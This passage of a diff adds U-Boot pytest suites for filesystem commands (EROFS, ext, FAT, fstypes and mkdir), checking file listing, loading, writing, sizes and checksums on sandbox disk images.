Test Case 1 - ls + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sls host 0:0' % fs_type]) + assert(re.search('2621440000 *%s' % BIG_FILE, ''.join(output))) + assert(re.search('1048576 *%s' % SMALL_FILE, ''.join(output))) + + with ubman.log.section('Test Case 1b - ls (invalid dir)'): + # In addition, test with a nonexistent directory to see if we crash. + output = ubman.run_command( + '%sls host 0:0 invalid_d' % fs_type) + assert('' == output) + + def test_fs2(self, ubman, fs_obj_basic): + """ + Test Case 2 - size command for a small file + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 2a - size (small)'): + # 1MB is 0x0010 0000 + # Test Case 2a - size of small file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%ssize host 0:0 /%s' % (fs_type, SMALL_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + with ubman.log.section('Test Case 2b - size (/../<file>)'): + # Test Case 2b - size of small file via a path using '..' + output = ubman.run_command_list([ + '%ssize host 0:0 /SUBDIR/../%s' % (fs_type, SMALL_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + def test_fs3(self, ubman, fs_obj_basic): + """ + Test Case 3 - size command for a large file + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 3 - size (large)'): + # 2.5GB (1024*1024*2500) is 0x9C40 0000 + # Test Case 3 - size of big file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%ssize host 0:0 /%s' % (fs_type, BIG_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=9c400000' in ''.join(output)) + + def test_fs4(self, ubman, fs_obj_basic): + """ + Test Case 4 - load a small file, 1MB + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 4 - load (small)'): + # Test Case 4a - Read full 1MB of small file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + + def test_fs5(self, ubman, fs_obj_basic): + """ + Test Case 5 - load, reading first 1MB of 3GB file + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 5 - load (first 1MB)'): + # Test Case 5a - First 1MB of big file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x0' % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 5b - First 1MB of big file + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + + def test_fs6(self, ubman, fs_obj_basic): + """ + Test Case 6 - load, reading last 1MB of 3GB file + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 6 - load (last 1MB)'): + # fails for ext as no offset support + # Test Case 6a - Last 1MB of big file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x9c300000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 6b - Last 1MB of big file + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[2] in ''.join(output)) + + def test_fs7(self, ubman, fs_obj_basic): + """ + Test Case 7 - load, 1MB from the last 1MB in 2GB + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 7 - load (last 1MB in 2GB)'): + # fails for ext as no offset support + # Test Case 7a - One from the last 1MB chunk of 2GB + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x7ff00000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 7b - One from the last 1MB chunk of 2GB + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[3] in ''.join(output)) + + def test_fs8(self, ubman, fs_obj_basic): + """ + Test Case 8 - load, reading first 1MB in 2GB + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 8 - load (first 1MB in 2GB)'): + # fails for ext as no offset support + # Test Case 8a - One from the start 1MB chunk from 2GB + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x80000000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 8b - One from the start 1MB chunk from 2GB + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[4] in ''.join(output)) + + def test_fs9(self, ubman, fs_obj_basic): + """ + Test Case 9 - load, 1MB crossing 2GB boundary + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 9 - load (crossing 2GB boundary)'): + # fails for ext as no offset support + # Test Case 9a - One 1MB chunk crossing the 2GB boundary + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x7ff80000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 9b - One 1MB chunk crossing the 2GB boundary + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[5] in ''.join(output)) + + def test_fs10(self, ubman, fs_obj_basic): + """ + Test Case 10 - load, reading beyond file end'): + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 10 - load (beyond file end)'): + # Generic failure case + # Test Case 10 - 2MB chunk from the last 1MB of big file + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s 0x00200000 0x9c300000' + % (fs_type, ADDR, BIG_FILE), + 'printenv filesize', + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + def test_fs11(self, ubman, fs_obj_basic): + """ + Test Case 11 - write' + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 11 - write'): + # Read 1MB from small file + # Write it back to test the writes + # Test Case 11a - Check that the write succeeded + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + '%swrite host 0:0 %x /%s.w $filesize' + % (fs_type, ADDR, SMALL_FILE)]) + assert('1048576 bytes written' in ''.join(output)) + + # Test Case 11b - Check md5 of written to is same + # as the one read from + output = ubman.run_command_list([ + '%sload host 0:0 %x /%s.w' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs12(self, ubman, fs_obj_basic): + """ + Test Case 12 - write to "." directory + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 12 - write (".")'): + # Next test case checks writing a file whose dirent + # is the first in the block, which is always true for "." + # The write should fail, but the lookup should work + # Test Case 12 - Check directory traversal + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%swrite host 0:0 %x /. 0x10' % (fs_type, ADDR)]) + assert('Unable to write' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs13(self, ubman, fs_obj_basic): + """ + Test Case 13 - write to a file with "/./<filename>" + """ + fs_type,fs_img,md5val = fs_obj_basic + with ubman.log.section('Test Case 13 - write ("./<file>")'): + # Read 1MB from small file + # Write it via "same directory", i.e. "." dirent + # Test Case 13a - Check directory traversal + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + '%swrite host 0:0 %x /./%s2 $filesize' + % (fs_type, ADDR, SMALL_FILE)]) + assert('1048576 bytes written' in ''.join(output)) + + # Test Case 13b - Check md5 of written to is same + # as the one read from + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /./%s2' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + + # Test Case 13c - Check md5 of written to is same + # as the one read from + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /%s2' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_erofs.py b/test/py/tests/test_fs/test_erofs.py new file mode 100644 index 00000000000..a2bb6b505f2 --- /dev/null +++ b/test/py/tests/test_fs/test_erofs.py @@ -0,0 +1,220 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2022 Huang Jianan <jnhuang95@gmail.com> +# Author: Huang Jianan <jnhuang95@gmail.com> + +import os +import pytest +import shutil +import subprocess + +EROFS_SRC_DIR = 'erofs_src_dir' +EROFS_IMAGE_NAME = 'erofs.img' + +def generate_file(name, size): + """ + Generates a file filled with 'x'. + """ + content = 'x' * size + file = open(name, 'w') + file.write(content) + file.close() + +def make_erofs_image(build_dir): + """ + Makes the EROFS images used for the test. + + The image is generated at build_dir with the following structure: + erofs_src_dir/ + ├── f4096 + ├── f7812 + ├── subdir/ + │  └── subdir-file + ├── symdir -> subdir + └── symfile -> f5096 + """ + root = os.path.join(build_dir, EROFS_SRC_DIR) + os.makedirs(root) + + # 4096: uncompressed file + generate_file(os.path.join(root, 'f4096'), 4096) + + # 7812: Compressed file + generate_file(os.path.join(root, 'f7812'), 7812) + + # sub-directory with a single file inside + subdir_path = os.path.join(root, 'subdir') + os.makedirs(subdir_path) + generate_file(os.path.join(subdir_path, 'subdir-file'), 100) + + # symlink + os.symlink('subdir', os.path.join(root, 'symdir')) + os.symlink('f7812', os.path.join(root, 'symfile')) + + input_path = os.path.join(build_dir, EROFS_SRC_DIR) + output_path = os.path.join(build_dir, EROFS_IMAGE_NAME) + args = ' '.join([output_path, input_path]) + subprocess.run(['mkfs.erofs -zlz4 ' + args], shell=True, check=True, + stdout=subprocess.DEVNULL) + +def clean_erofs_image(build_dir): + """ + Deletes the image and src_dir at build_dir. + """ + path = os.path.join(build_dir, EROFS_SRC_DIR) + shutil.rmtree(path) + image_path = os.path.join(build_dir, EROFS_IMAGE_NAME) + os.remove(image_path) + +def erofs_ls_at_root(ubman): + """ + Test if all the present files and directories were listed. + """ + no_slash = ubman.run_command('erofsls host 0') + slash = ubman.run_command('erofsls host 0 /') + assert no_slash == slash + + expected_lines = ['./', '../', '4096 f4096', '7812 f7812', 'subdir/', + '<SYM> symdir', '<SYM> symfile', '4 file(s), 3 dir(s)'] + + output = ubman.run_command('erofsls host 0') + for line in expected_lines: + assert line in output + +def erofs_ls_at_subdir(ubman): + """ + Test if the path resolution works. + """ + expected_lines = ['./', '../', '100 subdir-file', '1 file(s), 2 dir(s)'] + output = ubman.run_command('erofsls host 0 subdir') + for line in expected_lines: + assert line in output + +def erofs_ls_at_symlink(ubman): + """ + Test if the symbolic link's target resolution works. + """ + output = ubman.run_command('erofsls host 0 symdir') + output_subdir = ubman.run_command('erofsls host 0 subdir') + assert output == output_subdir + + expected_lines = ['./', '../', '100 subdir-file', '1 file(s), 2 dir(s)'] + for line in expected_lines: + assert line in output + +def erofs_ls_at_non_existent_dir(ubman): + """ + Test if the EROFS support will crash when get a nonexistent directory. + """ + out_non_existent = ubman.run_command('erofsls host 0 fff') + out_not_dir = ubman.run_command('erofsls host 0 f1000') + assert out_non_existent == out_not_dir + assert '' in out_non_existent + +def erofs_load_files(ubman, files, sizes, address): + """ + Loads files and asserts their checksums. + """ + build_dir = ubman.config.build_dir + for (file, size) in zip(files, sizes): + out = ubman.run_command('erofsload host 0 {} {}'.format(address, file)) + + # check if the right amount of bytes was read + assert size in out + + # calculate u-boot file's checksum + out = ubman.run_command('md5sum {} {}'.format(address, hex(int(size)))) + u_boot_checksum = out.split()[-1] + + # calculate original file's checksum + original_file_path = os.path.join(build_dir, EROFS_SRC_DIR + '/' + file) + out = subprocess.run(['md5sum ' + original_file_path], shell=True, check=True, + capture_output=True, text=True) + original_checksum = out.stdout.split()[0] + + # compare checksum + assert u_boot_checksum == original_checksum + +def erofs_load_files_at_root(ubman): + """ + Test load file from the root directory. + """ + files = ['f4096', 'f7812'] + sizes = ['4096', '7812'] + address = '$kernel_addr_r' + erofs_load_files(ubman, files, sizes, address) + +def erofs_load_files_at_subdir(ubman): + """ + Test load file from the subdirectory. + """ + files = ['subdir/subdir-file'] + sizes = ['100'] + address = '$kernel_addr_r' + erofs_load_files(ubman, files, sizes, address) + +def erofs_load_files_at_symlink(ubman): + """ + Test load file from the symlink. + """ + files = ['symfile'] + sizes = ['7812'] + address = '$kernel_addr_r' + erofs_load_files(ubman, files, sizes, address) + +def erofs_load_non_existent_file(ubman): + """ + Test if the EROFS support will crash when load a nonexistent file. + """ + address = '$kernel_addr_r' + file = 'non-existent' + out = ubman.run_command('erofsload host 0 {} {}'.format(address, file)) + assert 'Failed to load' in out + +def erofs_run_all_tests(ubman): + """ + Runs all test cases. + """ + erofs_ls_at_root(ubman) + erofs_ls_at_subdir(ubman) + erofs_ls_at_symlink(ubman) + erofs_ls_at_non_existent_dir(ubman) + erofs_load_files_at_root(ubman) + erofs_load_files_at_subdir(ubman) + erofs_load_files_at_symlink(ubman) + erofs_load_non_existent_file(ubman) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_erofs') +@pytest.mark.buildconfigspec('fs_erofs') +@pytest.mark.requiredtool('mkfs.erofs') +@pytest.mark.requiredtool('md5sum') + +def test_erofs(ubman): + """ + Executes the erofs test suite. + """ + build_dir = ubman.config.build_dir + + # If the EFI subsystem is enabled and initialized, EFI subsystem tries to + # add EFI boot option when the new disk is detected. If there is no EFI + # System Partition exists, EFI subsystem outputs error messages and + # it ends up with test failure. + # Restart U-Boot to clear the previous state. + # TODO: Ideally EFI test cases need to be fixed, but it will + # increase the number of system reset. + ubman.restart_uboot() + + try: + # setup test environment + make_erofs_image(build_dir) + image_path = os.path.join(build_dir, EROFS_IMAGE_NAME) + ubman.run_command('host bind 0 {}'.format(image_path)) + # run all tests + erofs_run_all_tests(ubman) + except: + clean_erofs_image(build_dir) + raise AssertionError + + # clean test environment + clean_erofs_image(build_dir) diff --git a/test/py/tests/test_fs/test_ext.py b/test/py/tests/test_fs/test_ext.py new file mode 100644 index 00000000000..9c213f2da55 --- /dev/null +++ b/test/py/tests/test_fs/test_ext.py @@ -0,0 +1,355 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:Exntented Test + +""" +This test verifies extended write operation on file system. +""" + +import os.path +import pytest +import re +from subprocess import check_output +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + +PLAIN_FILE='abcdefgh.txt' +MANGLE_FILE='abcdefghi.txt' + +def str2fat(long_filename): + splitext = os.path.splitext(long_filename.upper()) + name = splitext[0] + ext = splitext[1][1:] + if len(name) > 8: + name = '%s~1' % name[:6] + return '%-8s %s' % (name, ext) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestFsExt(object): + def test_fs_ext1(self, ubman, fs_obj_ext): + """ + Test Case 1 - write a file with absolute path + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 1 - write with abs path'): + # Test Case 1a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w1 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + assert('20480 bytes written' in ''.join(output)) + + # Test Case 1b - Check md5 of file content + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w1' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext2(self, ubman, fs_obj_ext): + """ + Test Case 2 - write to a file with relative path + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 2 - write with rel path'): + # Test Case 2a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x dir1/%s.w2 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + assert('20480 bytes written' in ''.join(output)) + + # Test Case 2b - Check md5 of file content + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x dir1/%s.w2' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext3(self, ubman, fs_obj_ext): + """ + Test Case 3 - write to a file with invalid path + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 3 - write with invalid path'): + # Test Case 3 - Check if command expectedly failed + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/none/%s.w3 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + assert('Unable to write file /dir1/none/' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext4(self, ubman, fs_obj_ext): + """ + Test Case 4 - write at non-zero offset, enlarging file size + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 4 - write at non-zero offset, enlarging file size'): + # Test Case 4a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w4 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/%s.w4 $filesize 0x1400' + % (fs_type, ADDR, MIN_FILE)) + assert('20480 bytes written' in output) + + # Test Case 4b - Check size of written file + output = ubman.run_command_list([ + '%ssize host 0:0 /dir1/%s.w4' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=6400' in ''.join(output)) + + # Test Case 4c - Check md5 of file content + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w4' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext5(self, ubman, fs_obj_ext): + """ + Test Case 5 - write at non-zero offset, shrinking file size + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 5 - write at non-zero offset, shrinking file size'): + # Test Case 5a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w5 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/%s.w5 0x1400 0x1400' + % (fs_type, ADDR, MIN_FILE)) + assert('5120 bytes written' in output) + + # Test Case 5b - Check size of written file + output = ubman.run_command_list([ + '%ssize host 0:0 /dir1/%s.w5' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=2800' in ''.join(output)) + + # Test Case 5c - Check md5 of file content + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w5' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[2] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext6(self, ubman, fs_obj_ext): + """ + Test Case 6 - write nothing at the start, truncating to zero + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 6 - write nothing at the start, truncating to zero'): + # Test Case 6a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w6 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/%s.w6 0 0' + % (fs_type, ADDR, MIN_FILE)) + assert('0 bytes written' in output) + + # Test Case 6b - Check size of written file + output = ubman.run_command_list([ + '%ssize host 0:0 /dir1/%s.w6' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=0' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext7(self, ubman, fs_obj_ext): + """ + Test Case 7 - write at the end (append) + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 7 - write at the end (append)'): + # Test Case 7a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w7 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/%s.w7 $filesize $filesize' + % (fs_type, ADDR, MIN_FILE)) + assert('20480 bytes written' in output) + + # Test Case 7b - Check size of written file + output = ubman.run_command_list([ + '%ssize host 0:0 /dir1/%s.w7' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=a000' in ''.join(output)) + + # Test Case 7c - Check md5 of file content + output = ubman.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w7' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[3] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext8(self, ubman, fs_obj_ext): + """ + Test Case 8 - write at offset beyond the end of file + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 8 - write beyond the end'): + # Test Case 8a - Check if command expectedly failed + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w8 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/%s.w8 0x1400 %x' + % (fs_type, ADDR, MIN_FILE, 0x100000 + 0x1400)) + assert('Unable to write file /dir1' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext9(self, ubman, fs_obj_ext): + """ + Test Case 9 - write to a non-existing file at non-zero offset + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 9 - write to non-existing file with non-zero offset'): + # Test Case 9a - Check if command expectedly failed + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w9 0x1400 0x1400' + % (fs_type, ADDR, MIN_FILE)]) + assert('Unable to write file /dir1' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext10(self, ubman, fs_obj_ext): + """ + 'Test Case 10 - create/delete as many directories under root directory + as amount of directory entries goes beyond one cluster size)' + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 10 - create/delete (many)'): + # Test Case 10a - Create many files + # Please note that the size of directory entry is 32 bytes. + # So one typical cluster may holds 64 (2048/32) entries. + output = ubman.run_command( + 'host bind 0 %s' % fs_img) + + for i in range(0, 66): + output = ubman.run_command( + '%swrite host 0:0 %x /FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = ubman.run_command('%sls host 0:0 /' % fs_type) + assert('FILE0123456789_00' in output) + assert('FILE0123456789_41' in output) + + # Test Case 10b - Delete many files + for i in range(0, 66): + output = ubman.run_command( + '%srm host 0:0 /FILE0123456789_%02x' + % (fs_type, i)) + output = ubman.run_command('%sls host 0:0 /' % fs_type) + assert(not 'FILE0123456789_00' in output) + assert(not 'FILE0123456789_41' in output) + + # Test Case 10c - Create many files again + # Please note no.64 and 65 are intentionally re-created + for i in range(64, 128): + output = ubman.run_command( + '%swrite host 0:0 %x /FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = ubman.run_command('%sls host 0:0 /' % fs_type) + assert('FILE0123456789_40' in output) + assert('FILE0123456789_79' in output) + + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext11(self, ubman, fs_obj_ext): + """ + 'Test Case 11 - create/delete as many directories under non-root + directory as amount of directory entries goes beyond one cluster size)' + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 11 - create/delete (many)'): + # Test Case 11a - Create many files + # Please note that the size of directory entry is 32 bytes. + # So one typical cluster may holds 64 (2048/32) entries. + output = ubman.run_command( + 'host bind 0 %s' % fs_img) + + for i in range(0, 66): + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = ubman.run_command('%sls host 0:0 /dir1' % fs_type) + assert('FILE0123456789_00' in output) + assert('FILE0123456789_41' in output) + + # Test Case 11b - Delete many files + for i in range(0, 66): + output = ubman.run_command( + '%srm host 0:0 /dir1/FILE0123456789_%02x' + % (fs_type, i)) + output = ubman.run_command('%sls host 0:0 /dir1' % fs_type) + assert(not 'FILE0123456789_00' in output) + assert(not 'FILE0123456789_41' in output) + + # Test Case 11c - Create many files again + # Please note no.64 and 65 are intentionally re-created + for i in range(64, 128): + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = ubman.run_command('%sls host 0:0 /dir1' % fs_type) + assert('FILE0123456789_40' in output) + assert('FILE0123456789_79' in output) + + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext12(self, ubman, fs_obj_ext): + """ + Test Case 12 - write plain and mangle file + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 12 - write plain and mangle file'): + # Test Case 12a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%swrite host 0:0 %x /%s 0' + % (fs_type, ADDR, PLAIN_FILE), + '%swrite host 0:0 %x /%s 0' + % (fs_type, ADDR, MANGLE_FILE)]) + assert('0 bytes written' in ''.join(output)) + # Test Case 12b - Read file system content + output = check_output('mdir -i %s' % fs_img, shell=True).decode() + # Test Case 12c - Check if short filename is not mangled + assert(str2fat(PLAIN_FILE) in ''.join(output)) + # Test Case 12d - Check if long filename is mangled + assert(str2fat(MANGLE_FILE) in ''.join(output)) + + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_fs_cmd.py b/test/py/tests/test_fs/test_fs_cmd.py new file mode 100644 index 00000000000..c925547c7bc --- /dev/null +++ b/test/py/tests/test_fs/test_fs_cmd.py @@ -0,0 +1,13 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 +# Niel Fourie, DENX Software Engineering, lusus@denx.de + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_fstypes(ubman): + """Test that `fstypes` prints a result which includes `sandbox`.""" + output = ubman.run_command('fstypes') + assert "Supported filesystems:" in output + assert "sandbox" in output diff --git a/test/py/tests/test_fs/test_fs_fat.py b/test/py/tests/test_fs/test_fs_fat.py new file mode 100644 index 00000000000..b61d8ab9eac --- /dev/null +++ b/test/py/tests/test_fs/test_fs_fat.py @@ -0,0 +1,25 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2023 Weidmüller Interface GmbH & Co. KG +# Author: Christian Taedcke <christian.taedcke@weidmueller.com> +# +# U-Boot File System: FAT Test + +""" +This test verifies fat specific file system behaviour. +""" + +import pytest +import re + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestFsFat(object): + def test_fs_fat1(self, ubman, fs_obj_fat): + """Test that `fstypes` prints a result which includes `sandbox`.""" + fs_type,fs_img = fs_obj_fat + with ubman.log.section('Test Case 1 - fatinfo'): + # Test Case 1 - ls + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'fatinfo host 0:0']) + assert(re.search('Filesystem: %s' % fs_type.upper(), ''.join(output))) diff --git a/test/py/tests/test_fs/test_mkdir.py b/test/py/tests/test_fs/test_mkdir.py new file mode 100644 index 00000000000..df680a87d57 --- /dev/null +++ b/test/py/tests/test_fs/test_mkdir.py @@ -0,0 +1,121 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:mkdir Test + +""" +This test verifies mkdir operation on file system. +""" + +import pytest +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestMkdir(object): + def test_mkdir1(self, ubman, fs_obj_mkdir): + """ + Test Case 1 - create a directory under a root + """ + fs_type,fs_img = fs_obj_mkdir + with 